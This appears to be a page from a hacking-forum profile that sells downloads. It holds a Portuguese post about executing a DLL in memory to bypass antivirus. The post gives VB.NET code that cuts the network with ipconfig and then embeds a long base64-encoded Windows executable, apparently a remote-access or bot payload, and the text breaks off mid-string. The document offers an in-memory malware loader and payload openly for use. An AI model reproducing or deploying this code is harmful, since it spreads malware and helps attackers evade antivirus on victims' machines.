Jump to content

Welcome to LeVeL23HackTools

Welcome to LeVeL23HackTools, like most online communities you must register to view or post in our community, but don't worry this is a simple free process that requires minimal information for you to signup. Be apart of LeVeL23HackTools by signing in or creating an account.

  • Start new topics and reply to others
  • Subscribe to topics and forums to get email updates
  • Get your own profile page and make new friends
  • Send personal messages to other members.

  • Announcements

    • dEEpEst

      RESTRICTIONS ON DOWNLOADS   10/17/2018

      You can download 5 files a day, if you want to make unlimited downloads you must buy PRIV8, you will have access to all the parts of the forum and you will be able to download unlimitedly without restrictions for a lifetime.

queda de faraó

LvL-23
  • Content count

    5
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

Community Reputation

17 Good

About queda de faraó

  • Rank
    Leech
  1. ejecutar dll en memoria

    Trago um video onde mostra como executar dll na memoria bypass avs Public Class Class1 Public Shared Sub Mestre_Queda() Shell("cmd /c ipconfig/release & ping -n 60 127.0.0.1 & ipconfig/renew & exit", vbHide) 'Interaction.MsgBox("testando esse karai") Dim Farao_Sama As String = "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oiUfKQYfDI8ZAAABJRMQUKIlHyoGHw2PGQAAASUTEVCiJRMSFBQfK40kAAABJdAZAAAEKDAAAAolExMXKA8AAAomERMXkS0CKyARBxESF5ooIAAACtAZAAABKC4AAAooLwAACnQZAAABURETHyCRLQIrIREIERIfIJooIAAACtAZAAABKC4AAAooLwAACnQZAAABURETHyGRLQIrIREJERIfIZooIAAACtAZAAABKC4AAAooLwAACnQZAAABURETHyKRLQIrIxESHyKaKCAAAArQGQAAASguAAAKKC8AAAp0GQAAAYAQAAAEERMfI5EtAishEQoREh8jmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfJJEtAishEQsREh8kmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfJZEtAishEQwREh8lmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfJpEtAishEQ0REh8mmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfJ5EtAishEQ4REh8nmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfKJEtAishEQ8REh8omiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfKZEtAishERAREh8pmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRERMfKpEtAishEREREh8qmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAFRACoBEAAAAAAFAaqvAVQYAAABGzAJAEYCAAAFAAARAAIOBigNAAAGFHLNAQBwGI0IAAABJRYFciECAHAOBCgkAAAKoiUXF4wkAAABohQUFCgfAAAKFHKvAABwHI0IAAABJRYOBaIlFw4HjCgAAAGiJRgDoiUZBKIlGn4TAAAEoiUbfg8AAASiJQsUFByNJAAAASXQGAAABCgwAAAKJQwXKA8AAAomCBaRLQIrHgcWmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAEQBQgXkS0CKx4HF5ooIAAACtAoAAABKC4AAAooLwAACqUoAAABEAcIGJEtAiseBxiaKCAAAArQGQAAASguAAAKKC8AAAp0GQAAARABCBmRLQIrHgcZmiggAAAK0BkAAAEoLgAACigvAAAKdBkAAAEQAggakS0CKyEHGpooIAAACtAZ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GI0IAAABJRYCewkAAAQRFI8ZAAABJRMVUKIlFwJ7CgAABBEUjxkAAAElExZQoiUTChQUGI0kAAABJRYXnCUXF5wlEwsXKA8AAAomEQsWkS0CKyARFREKFpooIAAACtAZAAABKC4AAAooLwAACnQZAAABURELF5EtAisgERYRCheaKCAAAArQGQAAASguAAAKKC8AAAp0GQAAAVECF30DAAAEAhRyxwIAcBeNCAAAASUWctECAHB+EwAABAJ7CwAABH4TAAAEKEwAAAoCcnsBAHACKBkAAAYoGwAACigjAAAGKCYAAAp+EwAABCgmAAAKAigTAAAGKCYAAAp+EwAABCgmAAAKAihNAAAKcukCAHAoTgAACigkAAAKKCMAAAYoJgAACn4TAAAEKCYAAAoCKBoAAAYoJgAACn4TAAAEKCYAAAoCfhIAAARvTwAACnLxAgBwKBsAAAYoJAAACigjAAAGKCYAAAp+EwAABCgmAAAKAgIoHQAABignAAAKKCMAAAYoJgAACn4TAAAEKCYAAAp+EgAABG9QAAAKjDIAAAEoJgAACn4TAAAEKCYAAAoCcvUCAHAoHAAABigmAAAKfhMAAAQoJgAACgJyMwMAcCgcAAAGKCYAAAp+EwAABCgmAAAKAnsKAAAEAnsOAAAEmigmAAAKfhMAAAQoJgAACgIoHgAABigmAAAKfhMAAAQoJgAACgIoUQAACm9SAAAKKCMAAAYoJgAACn4TAAAEKCYAAApybwMAcCgmAAAKohQUFBcoDwAACiYCERR9DQAABAIRFH0OAAAEFwzdOvj//ygVAAAKAHJ7AwBwKBkAAAooFwAACgACFn0NAAAEAhZ9DgAABCgWAAAK3gAAERQX1hMUERQREz4j/f//CBMXERcsBxYMOEj8//8AOOv3//8AAEHEAAAAAAAACwAAABgAAAAjAAAADQAAABgAAAEAAAAACgAAACkAAAAzAAAADQAAABgAAAEAAAAAQQAAAAUEAABGBAAADQAAABgAAAEAAAAAYgQAABgAAAB6BAAADQAAABgAAAEAAAAAYQQAACkAAACKBAAADQAAABgAAAEAAAAAnwQAADwAAADbBAAADQAAABgAAAEAAAAA6QQAABoAAAADBQAADQAAABgAAAEAAAAALgUAAKECAADPBwAAKwAAABgAAAETMAcAIAAAAAYAABEAAnsCAAAEFHITAgBwFo0IAAABFBQUKB8AAAoKKwAGKhswDQA9AgAACAAAEQACewMAAAQW/gEKBiwFOCkCAAAAAHM0AAAKCwcUcmcCAHAZjQgAAAElFgOiJRcWjCgAAAGiJRgDjmmMKAAAAaIlDBQUGY0kAAABJRYXnCUNFygPAAAKJgkWkS0CKx4IFpooIAAACtABAAAbKC4AAAooLwAACnQBAAAbEAEHFHJnAgBwGY0IAAABJRYCfg8AAAQoHwAABqIlFxaMKAAAAaIlGH4PAAAEb1MAAAqMKAAAAaIUFBQXKA8AAAomAnsCAAAEFHITAgBwFo0IAAABFBQUKB8AAAoUcoUDAHAXjQgAAAElFgOOaYwoAAABohQUFhcoRgAACgACewIAAAQUchMCAHAWjQgAAAEUFBQoHwAAChRyOQIAcBiNCAAAASUWFYwoAAABoiUXF4wtAAABohQUFBcoDwAACiYCewIAAAQUchMCAHAWjQgAAAEUFBQoHwAAChRyxwIAcBqNCAAAASUWBxMEEQQUcnMCAHAWjQgAAAEUFBQoHwAACqIlFxaMKAAAAaIlGAcTBREFFHKjAwBwFo0IAAABFBQUKB8AAAqiJRkWjC8AAAGiJQwUFBqNJAAAASUWF5wlGBecJQ0XKA8AAAomCRaRLQIrHhEEFHJzAgBwF40IAAABJRYIFpqiFBQXFihGAAAKAAkYkS0CKx4RBRRyowMAcBeNCAAAASUWCBiaohQUFxYoRgAACgAHFHKDAgBwFo0IAAABFBQUFygPAAAKJt4UKBUAAAoAAhZ9AwAABCgWAAAK3gAAKgAAAEEcAAAAAAAAFAAAABMCAAAnAgAAFAAAABgAAAFCAAICAygfAAAGKBEAAAYAKgAAABswAgA5AAAABgAAEQAAKFQAAAooVQAACm9WAAAKFm9XAAAKdDYAAAFvWAAACgreEygVAAAKAHKxAwBwCigWAAAK3gAGKgAAAAEQAAAAAAEAIyQAExgAAAEbMAgAVAAAAAkAABEAAHK7AwBwKFkAAApydwEAcCgbAAAKDBICFA0SAxYSARYTBBIEFhMFEgUUEwYSBhYoFAAABiYHKFoAAAoK3hMoFQAACgBy0wMAcAooFgAACt4ABioBEAAAAAABAD4/ABMYAAABGzAFAE0AAAAKAAARAAAWCwe1H2QoWwAACg0SAx9kFBMEEgQfZCgXAAAGDAgsCHLbAwBwCt4hAAcX1gsHGjHR3g0oFQAACgAoFgAACt4AAHLjAwBwCisABioAAAABEAAAAAABADQ1AA0YAAABGzACAHEAAAALAAARAABy6QMAcHNcAAAKKF0AAApvXgAACgsrKQdvXwAACnQ7AAABDAhyJQQAcG9gAAAKKCAAAAooYQAACigjAAAKCt4tB29iAAAKDQktzd4LBywHB29jAAAKANzeEygVAAAKAHKxAwBwCigWAAAK3gEABioAAAABHAAAAgACAExOAAsAAAAAAAABAFpbABMYAAABGzAEAOIAAAAMAAARAAB+GAAACgtyPwQAcH4SAAAEb08AAApyZwQAcG8/AAAKcvUAAHBybQQAcChkAAAKbyoAAAooGwAACgNzZQAACihdAAAKb14AAAoMKyQIb18AAAp0OwAAAQ0HCXJxBABwb2AAAApvKgAACigbAAAKCwAIb2IAAAoTBBEELdDeCwgsBwhvYwAACgDcB34YAAAKFigiAAAKFv4DEwURBSwPAgcoIwAABignAAAKCt4yAAJyiQQAcCgjAAAGKCcAAAoK3h4oFQAACgACcokEAHAoIwAABignAAAKCigWAAAK3gAGKgAAARwAAAIACAB3fwALYwAAAAAAAQDBwgAeGAAAARswAwAvAAAABgAAEQAAcpEEAHByFgUAcBQoKQAACm8qAAAKCt4TKBUAAAoAcrEDAHAKKBYAAAreAAYqAAEQAAAAAAEAGRoAExgAAAETMAMANAAAAA0AABEAIAABAABzZgAACgsoFQAABgcHb2cAAAooFgAABiYCB29oAAAKKCMAAAYoJwAACgorAAYqEzACABEAAAAOAAARAChpAAAKA29qAAAKCisABioAAAATMAIAEQAAAA8AABEAKGkAAAoDb2sAAAoKKwAGKgAAABMwBgCVAAAAEAAAEQBzbAAACgtzNAAACgxzNAAACg0CAyggAAAGBBUWKA0AAAoTBAgDFhEEFppvUwAACm9tAAAKAAkDEQQWmm9TAAAKBG9TAAAK1gOOaREEFppvUwAACgRvUwAACtbab20AAAoABwhvbgAACm9vAAAKAAcJb24AAApvbwAACgAIb3AAAAoACW9wAAAKAAdvcQAACgorAAYqAAAAEzAEAIEAAAARAAARAHM0AAAKCwcDFgOOaW9tAAAKAAcWam9y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EQJKAAwCEQLECBcCCQLJCAYA+QHPCNQBSQHYCB8CLgATACIDLgALABkDQwAjADwCQwAbADcCgwAbADcCowAbADcC4ABzADcCoAQbADcCoAQzADcCAAUzADcCLwDKAjEAygI7AMoCRwDKAksAygIBACsAAAAGAAEABgAAAAcAQQNHA2EDZwOTA54DogPHA9ID3APkA+8D/AMDBAgEDAQhBAcJEAkXCSQJKgk3CUUB5gFDASkA5goBAEMBKwAMCwIARgEtACALAgBDAS8AQAsDAAABMQB/CwQAUCAAABgAWCAAABkABIAAAAAAAAAAAAAAAAAAAAAAhQwAAAIAAAAAAAAAAAAAACUCQQkAAAAACAAAAAAAAAAAAAAALgK1AQAAAAACAAAAAAAAAAAAAAAlAm4AAAAAAAIAAAAAAAAAAAAAAC4CPwcAAAAAAgAAAAAAAAAAAAAAJQJ1AQAAAAAEAAMABgAFAAcABQAAAAA8TW9kdWxlPgBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUALmN0b3IAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtAE11bHRpY2FzdERlbGVnYXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dlckRpc3BsYXlBdHRyaWJ1dGUASUFzeW5jUmVzdWx0AEFzeW5jQ2FsbGJhY2sAT2JqZWN0AEV2ZW50SGFuZGxlcgBFdmVudEFyZ3MARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAU3lzdGVtLlRocmVhZGluZwBNdXRleABSZWxlYXNlTXV0ZXgAVGhyZWFkAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5EZXZpY2VzAENvbXB1dGVySW5mbwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBBcHBsaWNhdGlvbgBnZXRfRXhlY3V0YWJsZVBhdGgAVGhyZWFkU3RhcnQATWljcm9zb2Z0LlZpc3VhbEJhc2ljAFN0cmluZ3MAQ29tcGFyZU1ldGhvZABTcGxpdABTVEFUaHJlYWRBdHRyaWJ1dGUATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbX